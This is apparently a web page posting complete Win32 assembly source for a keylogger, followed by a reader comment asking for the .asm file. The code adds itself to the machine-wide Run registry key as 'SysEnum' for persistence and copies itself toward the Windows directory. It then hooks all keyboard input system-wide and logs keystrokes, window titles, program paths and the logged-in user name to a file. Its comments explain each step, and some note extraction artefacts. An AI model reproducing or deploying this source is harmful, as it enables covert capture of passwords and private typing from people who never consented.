Simple keylogger in Win32Asm

  
.386
.model flat, stdcall
option casemap:none

include windows.inc
include kernel32.inc
include user32.inc
include advapi32.inc
include msvcrt.inc

includelib user32.lib 
includelib kernel32.lib 
includelib advapi32.lib 
includelib msvcrt.lib 

KeyBoardProc proto :DWORD, :WPARAM, :LPARAM 

; pushz — push the address of an inline NUL-terminated string.
; `call nexti` pushes its return address, which is the address of the
; `db` bytes that immediately follow; execution resumes at nexti, so the
; net effect is one pointer on the stack.  The string bytes live inside
; .code, next to the call that references them.
pushz	macro szText:VARARG
	local	nexti 
	call	nexti 
	db	szText,00h
nexti: 
endm

.data

; Globals.  The spacing of several initialisers (`dd0`, `db"..."`) and the
; missing path separators in szRun and onlyOneCopy look like artefacts of the
; page extraction (see the reader comment below the listing); they are left
; exactly as found.
hBuffer			dd		? 		; in/out size (chars) for the name queries in KeyBoardProc
hComputerName 		db 		32  dup(0)	; GetComputerNameExA, format 0 (NetBIOS name)
hCurrentThreadPiD 	dd 		0		; process id owning the foreground window
hCurrentWindow		dd0				; last foreground HWND seen by the hook
hDateFormat		db"dd MMM yyyy", 0		; GetDateFormat picture string
hDomaineName  		db 		128 dup(0)	; GetComputerNameExA, format 1 (DNS host name)
hFile			dd0				; FILE* from fopen("log.txt","ab")
hHook			dd0				; HHOOK from SetWindowsHookExA
hmodul  		MODULEENTRY32  	<> 		; filled by Module32First; only szExePath is read
hSnapShot 		dd 		0		; Toolhelp snapshot handle
hTimeFormat		db"hh:mm:ss tt", 0		; GetTimeFormat picture string
hUserName               db 		32  dup(0)	; GetUserName output
msg			MSG		<> 		; receives the single GetMessageA result
onlyOneCopy		db"Globalzkl",0			; single-instance mutex name (separator presumably lost) — an observable artefact
 szRun db "SOFTWAREMicrosoftWindowsCurrentVersionRun",0	; autostart key path under HKLM (separators presumably lost)
 szReg db "SysEnum",0					; Run value name written by main — the persistence indicator
 buffer db 50 dup(?)					; GetWindowsDirectory result, passed as the CopyFile destination

.data? 
  hReg dd ? 						; HKEY opened by RegOpenKeyEx
  szPath db 256 dup(?)					; this executable's own path (GetModuleFileName)

.code
;-----------------------------------------------------------------------
; main — program entry (`end main`).  Observed sequence:
;   1. open 80000002h (HKEY_LOCAL_MACHINE) \ szRun with access mask
;      00020000h+0002h+0004h (READ_CONTROL|KEY_SET_VALUE|KEY_CREATE_SUB_KEY)
;      and store this executable's path as a type-1 (REG_SZ) value named
;      szReg — a per-machine autostart entry and the clearest detection point
;      (Run-key value written by an unsigned user binary);
;   2. CopyFile this executable toward the path GetWindowsDirectory returned;
;   3. single-instance guard: named mutex onlyOneCopy, exit if it already exists;
;   4. fopen("log.txt","ab"), install a WH_KEYBOARD_LL hook for all threads
;      (ebx = 0), block in GetMessageA, then unhook, fclose, ExitProcess.
;-----------------------------------------------------------------------
main: 

	invoke RegOpenKeyEx, 80000002h, addr szRun, 0, 00020000h+0002h+0004h, addr hReg 
	invoke GetModuleFileName, 0, addr szPath, sizeof szPath 
	; eax = length returned by GetModuleFileName (chars, terminator excluded) is used as cbData
	invoke RegSetValueEx, hReg, ADDR szReg, 0, 1, addr szPath, eax
	invoke RegCloseKey, hReg 

	; buffer receives the Windows directory path and is passed unchanged as the copy target
	invoke GetWindowsDirectory, addr buffer, sizeof buffer 
	invoke CopyFile,addr szPath,addr buffer,FALSE 

	; CreateMutexA(NULL, FALSE, name); ERROR_ALREADY_EXISTS => another instance is running
	invoke	 CreateMutexA,0,0,addr onlyOneCopy 
	invoke	 GetLastError 
	cmp	 eax,ERROR_ALREADY_EXISTS 
	je	 more_than_one_copy 

	xor	ebx, ebx		; ebx = 0, reused below as dwThreadId (hook all threads)

	; hFile = fopen("log.txt", "ab")  — cdecl, caller pops the two arguments
 	pushz	"ab"
 	pushz	"log.txt"
 	call	fopen 
  	add	esp, 2*4
 	mov	[hFile], eax

	invoke  GetModuleHandleA, NULL 

	; hHook = SetWindowsHookExA(WH_KEYBOARD_LL, KeyBoardProc, hModule, 0)
	invoke 	SetWindowsHookExA, WH_KEYBOARD_LL, ADDR KeyBoardProc, eax, ebx
	mov	[hHook], eax

	; a single message wait; the low-level hook callback runs while this thread sits here
	invoke	GetMessageA, ADDR msg, NULL, NULL, NULL 

	invoke	UnhookWindowsHookEx, hHook 

	invoke	fclose, hFile 

more_than_one_copy: 

	invoke	ExitProcess, 0h 

;-----------------------------------------------------------------------
; LRESULT CALLBACK KeyBoardProc(int nCode, WPARAM wParam, LPARAM lParam)
; WH_KEYBOARD_LL hook procedure.  lParam points at a KBDLLHOOKSTRUCT, read
; here as consecutive DWORDs: vkCode, scanCode, flags.
; Every path ends in CallNextHookEx, so keystrokes are never swallowed.
; Key-up events are skipped.  When the foreground window changed since the
; previous call, a header (date, time, owning module path, window title)
; and the user name are appended to hFile; then the key is written either
; as the character(s) ToAscii produces or, failing that, as the key name
; from GetKeyNameTextA.
; esi, edi and ebx are used as scratch without being preserved, although
; they are callee-saved under stdcall (the PROC has no USES clause).
; The hand-rolled cdecl calls below pop fewer bytes than they push; esp is
; presumably restored from ebp by the PROC epilogue, which masks this.
;-----------------------------------------------------------------------
KeyBoardProc	PROC	nCode:DWORD, wParam:DWORD, lParam:DWORD
	LOCAL	lpKeyState[256]	:BYTE		; key-state array; also reused as the window-title buffer
         LOCAL   lpClassName[64]	:BYTE
	LOCAL	lpCharBuf[32]	:BYTE		; ToAscii / GetKeyNameTextA output
       	LOCAL   lpDateBuf[12]	:BYTE		; "dd MMM yyyy" + NUL fits exactly
         LOCAL   lpTimeBuf[12]	:BYTE		; "hh:mm:ss tt" + NUL fits exactly
         LOCAL   lpLocalTime	:SYSTEMTIME 
	;----------------------------

	; zero lpKeyState (256 bytes = 64 dwords)
	lea	edi, [lpKeyState]
	push	256/4
	pop	ecx
	xor	eax, eax
	rep	stosd

	; only key-down events are logged
	mov	eax, wParam 
	cmp	eax, WM_KEYUP 
	je	next_hook 

	cmp	eax, WM_SYSKEYUP 
	je	next_hook 

	; same foreground window as last time -> skip the header block
	invoke	GetForegroundWindow 
	cmp	[hCurrentWindow], eax
	je	no_window_change 

	mov	[hCurrentWindow], eax

	invoke	GetClassName, hCurrentWindow, ADDR lpClassName, 64

	invoke 	GetLocalTime, ADDR lpLocalTime 

	invoke	GetDateFormat, NULL, NULL, ADDR lpLocalTime, ADDR hDateFormat, ADDR lpDateBuf, 12

	invoke	GetTimeFormat, NULL, NULL, ADDR lpLocalTime, ADDR hTimeFormat, ADDR lpTimeBuf, 12

	; hCurrentThreadPiD receives the owning process id; the thread id in eax is discarded
	invoke	GetWindowThreadProcessId, hCurrentWindow, ADDR hCurrentThreadPiD 

	; first module in the process snapshot; only hmodul.szExePath is used afterwards
	invoke 	CreateToolhelp32Snapshot, TH32CS_SNAPMODULE, hCurrentThreadPiD 
	mov 	hSnapShot,eax

        mov 	hmodul.dwSize, sizeof MODULEENTRY32 

	invoke 	Module32First,hSnapShot,addr hmodul 

	invoke 	CloseHandle,hSnapShot 

	; the window title is read into lpKeyState, reused here as scratch
	invoke	GetWindowText, hCurrentWindow, ADDR lpKeyState, 256

	; fprintf(hFile, "\r\n[%s, %s - Program:%s]\r\n", date, time, exePath)
	; five dwords are pushed (three args, format, FILE*) but twelve bytes popped
        lea     esi, [hmodul.szExePath]
        push	esi
        lea 	esi, [lpTimeBuf]
        push	esi
        lea	esi, [lpDateBuf]
        push    esi
	pushz	13,10,"[%s, %s - Program:%s]",13,10
	push	[hFile]
	call	fprintf 
	add	esp, 3*4

	; fprintf(hFile, "\r\n[       Windows Name:%s       ]\r\n", title, className)
	; the format has a single %s, so lpClassName is pushed but never printed
	lea	esi, [lpClassName]
	push	esi
	lea	esi, [lpKeyState]
	push	esi
	pushz	13,10,"[       Windows Name:%s       ]",13,10
	push	[hFile]
	call	fprintf 
	add	esp, 3*4

	; hBuffer is the in/out size argument for each name query
	mov 	hBuffer, 128
	invoke	GetComputerNameExA, 1, ADDR hDomaineName, ADDR hBuffer 

	mov	hBuffer, 32
	invoke	GetComputerNameExA, 0, ADDR hComputerName, ADDR hBuffer 

	mov	hBuffer, 32
	invoke	GetUserName, ADDR hUserName, ADDR hBuffer 

	; fprintf(hFile, "[       Logged user: %s]\r\n", userName)
	; hDomaineName and hComputerName are collected but not written anywhere in this block
        lea 	esi, [hUserName]
        push 	esi
        pushz 	"[       Logged user: %s]",13,10
        push	[hFile]
	call	fprintf 
	add	esp, 3*4

	invoke	fflush, hFile 

no_window_change: 
	; eax = vkCode, the first DWORD of the hook structure
	mov	esi, [lParam]
	lodsd
	cmp	al, VK_LSHIFT 		; modifier keys themselves are not logged
	je	next_hook 
	cmp	al, VK_RSHIFT 
	je	next_hook 
	cmp	al, VK_CAPITAL 
	je	next_hook 
	cmp	al, VK_ESCAPE 		; these three are logged by key name, not translated
	je	get_name_of_key 
	cmp	al, VK_BACK 
	je	get_name_of_key 
	cmp	al, VK_TAB 
	je	get_name_of_key 
	;------------------
	; zero lpCharBuf (32 bytes = 8 dwords)
	lea	edi, [lpCharBuf]
	push	32/4
	pop	ecx
	xor	eax, eax
	rep	stosd
	;----------

	; ebx = lpKeyState for the rest of the procedure
	lea	ebx, [lpKeyState]
	push	ebx
	call	GetKeyboardState 

	; overwrite the VK_SHIFT (index 16) and VK_CAPITAL (index 20) slots with the
	; GetKeyState results, left and right shift OR-ed; only the low byte is stored
	invoke	GetKeyState, VK_LSHIFT 
	xchg	esi, eax

	invoke	GetKeyState, VK_RSHIFT 
	or	eax, esi

	mov	byte ptr [ebx + 16], al

	invoke	GetKeyState, VK_CAPITAL 
	mov	byte ptr [ebx + 20], al

	; ToAscii(vkCode, scanCode, lpKeyState, lpCharBuf, 0) — arguments pushed right to left
	mov	esi, [lParam]
	lea	edi, [lpCharBuf]
	push	00h			; uFlags
	push	edi			; lpChar
	push	ebx			; lpKeyState
	lodsd				; eax = vkCode
	xchg	eax, edx
	lodsd				; eax = scanCode
	push	eax			; uScanCode
	push	edx			; uVirtKey
	call	ToAscii 
	test	eax, eax
	jnz	test_carriage_return	; non-zero: characters were produced

get_name_of_key: 
	; ecx = (scanCode << 16) | (flags << 24): bit 0 of flags lands on the
	; extended-key bit (24) of GetKeyNameText's lParam
	mov	esi, [lParam]
	lodsd				; vkCode, discarded
	lodsd				; scanCode
	shl	eax, 16
	xchg	eax, ecx
	lodsd				; flags
	shl	eax, 24
	or	ecx, eax

	; GetKeyNameTextA(ecx, lpCharBuf, 32)
	push	32			; cchSize
	lea	edi, [lpCharBuf]
	push	edi			; lpString
	push	ecx			; lParam
	call	GetKeyNameTextA 

	; fprintf(hFile, "[%s]", keyName) — the two arguments are pushed here, FILE* below
	push	edi
	pushz	"[%s]"
	jmp	write_to_file 

test_carriage_return: 
	; fprintf(hFile, "%s", chars); a leading CR is extended to CR LF in place
	push	edi
	pushz	"%s"

	cmp	byte ptr [edi], 0dh
	jne	write_to_file 

	mov	byte ptr [edi + 1], 0ah
write_to_file: 
	; invoke pushes only hFile on top of the two arguments already pushed and
	; presumably cleans up only its own push
	invoke	fprintf, hFile 

next_hook: 
	; always chain; the return value is whatever CallNextHookEx returns in eax
	invoke	CallNextHookEx, hHook, nCode, wParam, lParam 
	ret

KeyBoardProc	ENDP

end	main 

; See: http://mo4x.com/

2 Responses to Simple keylogger in Win32Asm

  1. asm says:

    hey can you upload this somewhere as a .asm file so I can test it? I can't copy and paste it because a bunch of weird HTML symbols get stuck in it. Awesome job though
